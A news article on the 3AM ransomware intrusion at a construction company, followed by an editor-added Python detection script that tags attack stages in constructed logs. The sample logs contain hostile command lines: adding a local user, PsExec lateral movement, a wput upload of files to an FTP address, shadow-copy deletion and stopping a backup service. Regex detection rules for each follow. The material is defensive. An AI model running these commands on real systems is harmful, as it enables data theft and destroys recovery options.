In a recent incident, a construction company fell victim to a cyber attack in which hackers attempted to deploy the LockBit ransomware but were unsuccessful. However, they didn’t give up and instead deployed a never-before-seen ransomware named 3AM, which managed to break through the defenses of the target network.
The new ransomware, 3AM, follows a similar pattern to other ransomware attacks. It blocks various cybersecurity and backup-related software and encrypts the files on the victim’s computer. However, what sets it apart is its unique theme – the use of 3 a.m. as a reference point. This time is typically associated with insomniacs, night owls, and hackers who are still active and working during those hours.
According to a report by Symantec, researchers observed the first use of 3AM in a double-whammy attack, where the LockBit ransomware was initially blocked but 3AM managed to infiltrate and compromise one machine. Dick O’Brien, the principal intelligence analyst for the Symantec threat hunter team, warns that organizations should expect attackers to use multiple ransomware families in their attacks.
Upon gaining access to the target network, the threat actors behind the attack started collecting user information and deploying data harvesting tools. They used tools like Cobalt Strike and PsExec to escalate privileges and ran commands to gather network status and identify other servers for lateral movement. They also added a new user for persistence and uploaded the victim’s files to their own file transfer protocol (FTP) server using the Wput utility.
The attackers intended to deploy LockBit, a popular ransomware-as-a-service, but their plans were foiled by the target’s robust cybersecurity protections. However, they had a backup plan in the form of 3AM. This ransomware appends encrypted files with the suffix “.threeamtime” and references the time of day in its ransom note. The note taunts the victim, claiming that all files are encrypted and backups have disappeared, but they can restore everything quickly if a ransom is paid.
While the ransom note may be creative, the malware itself shows less innovation. 3AM is a 64-bit executable written in Rust, a programming language increasingly favored by attackers and defenders alike. It attempts to kill various security and backup-related software on the host machine and then proceeds to scan the disk, identify specific file types, encrypt them, drop the ransom note, and delete any Volume Shadow Copies (Windows VSS snapshots) that could otherwise help the victim recover their files.
The attackers managed to deploy 3AM on three machines, but it was blocked on two of them. However, it successfully penetrated the third machine where LockBit was ineffective. Dick O’Brien suggests that this success may be due to 3AM being a previously unseen threat, whereas LockBit is more well-known. The hackers claim to have stolen sensitive data from the compromised machine, but Symantec could not verify this claim.
In the face of ransomware attacks, O’Brien advises organizations to adopt a defense-in-depth strategy. It is crucial to address all stages of a potential attack and not just focus on blocking the payloads. Early detection and prevention are key to mitigating the impact of such attacks.
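The behaviors described above (new local user for persistence, PsExec for lateral movement, Wput uploads to an FTP server, termination of backup software, deletion of shadow copies, and the ".threeamtime" suffix) each map to a different stage of the intrusion, which is what makes the defense-in-depth advice actionable: a host that trips several stages should be escalated before any payload runs. The following Python example is added here by the editor and is not Symantec's or the article's code; it runs a small set of stage-tagged rules over constructed endpoint telemetry. The log format and the exact command lines (for example `net user ... /add`, `vssadmin delete shadows`) are assumptions, since the article names the tools and outcomes but not the commands.

```python
"""Stage-aware triage of constructed endpoint telemetry for the 3AM intrusion.

Example code added by the editor, not from the article or Symantec.
Assumed log format (constructed): "<timestamp> <host> <event> <detail>".
Command lines below are assumptions about how the reported actions look.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Constructed sample telemetry (not real data from the incident).
SAMPLE_LOG = """\
2023-09-01T03:02:11 host1 process cmd.exe /c net user backupsvc P@ss /add
2023-09-01T03:02:40 host1 process PsExec64.exe \\\\host2 -s cmd.exe
2023-09-01T03:05:02 host1 process wput.exe C:\\Share\\finance\\ ftp://203.0.113.5/up/
2023-09-01T03:10:15 host2 process vssadmin.exe delete shadows /all /quiet
2023-09-01T03:10:20 host2 process net stop "Veeam Backup Service"
2023-09-01T03:11:01 host2 file_rename C:\\Users\\a\\report.docx -> C:\\Users\\a\\report.docx.threeamtime
2023-09-01T03:11:02 host2 process notepad.exe C:\\Users\\a\\notes.txt
2023-09-01T09:00:00 host3 process explorer.exe
"""

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")

# (rule name, attack stage, pattern). Stages are labelled loosely after the
# article's narrative; the ".threeamtime" suffix is the one indicator it gives.
RULES = [
    ("new_local_user", "persistence",
     re.compile(r"\bnet\S*\s+user\b.*\s/add\b", re.I)),
    ("psexec_remote_exec", "lateral_movement",
     re.compile(r"\bpsexec(?:64)?\.exe\b", re.I)),
    ("ftp_upload_tool", "exfiltration",
     re.compile(r"\bwput(?:\.exe)?\b.*\bftp://", re.I)),
    ("backup_service_stop", "defense_evasion",
     re.compile(r"\bnet\S*\s+stop\b.*\bbackup\b", re.I)),
    ("shadow_copy_deletion", "impact",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b", re.I)),
    ("threeamtime_extension", "impact",
     re.compile(r"\.threeamtime\b", re.I)),
]


@dataclass(frozen=True)
class Finding:
    host: str
    stage: str
    rule: str
    line: str


def scan(log_text: str) -> list[Finding]:
    """Return one Finding per (line, rule) match; lines that do not parse are skipped."""
    findings: list[Finding] = []
    for raw in log_text.splitlines():
        m = LINE_RE.match(raw)
        if not m:
            continue
        _ts, host, _event, detail = m.groups()
        for rule, stage, pattern in RULES:
            if pattern.search(detail):
                findings.append(Finding(host, stage, rule, raw))
    return findings


def stages_by_host(findings: list[Finding]) -> dict[str, set[str]]:
    """Collapse findings into the distinct attack stages seen per host."""
    out: dict[str, set[str]] = {}
    for f in findings:
        out.setdefault(f.host, set()).add(f.stage)
    return out


def escalate(findings: list[Finding], min_stages: int = 2) -> list[str]:
    """Hosts showing at least min_stages distinct stages.

    A single rule hit can be noise; several stages on one host within the
    same window is the chained activity the article describes and should be
    escalated before the encryption payload lands.
    """
    return sorted(h for h, s in stages_by_host(findings).items() if len(s) >= min_stages)


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for f in found:
        print(f"{f.host:6} {f.stage:16} {f.rule:22} {f.line}")
    print("escalate:", escalate(found))
```

Tuning the rules to real telemetry means binding them to the fields your EDR actually emits (process command line, parent process, file rename events) rather than a flat text line, and raising `min_stages` or adding a time window to suit the environment's baseline noise; the structure, one rule per stage and a per-host roll-up, is the part that carries over.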
As cybercriminals continue to evolve their tactics, organizations must remain vigilant and implement robust cybersecurity measures to protect themselves against ransomware attacks. The ability to detect and respond to threats promptly can make a significant difference in minimizing the damage caused by these malicious actors.
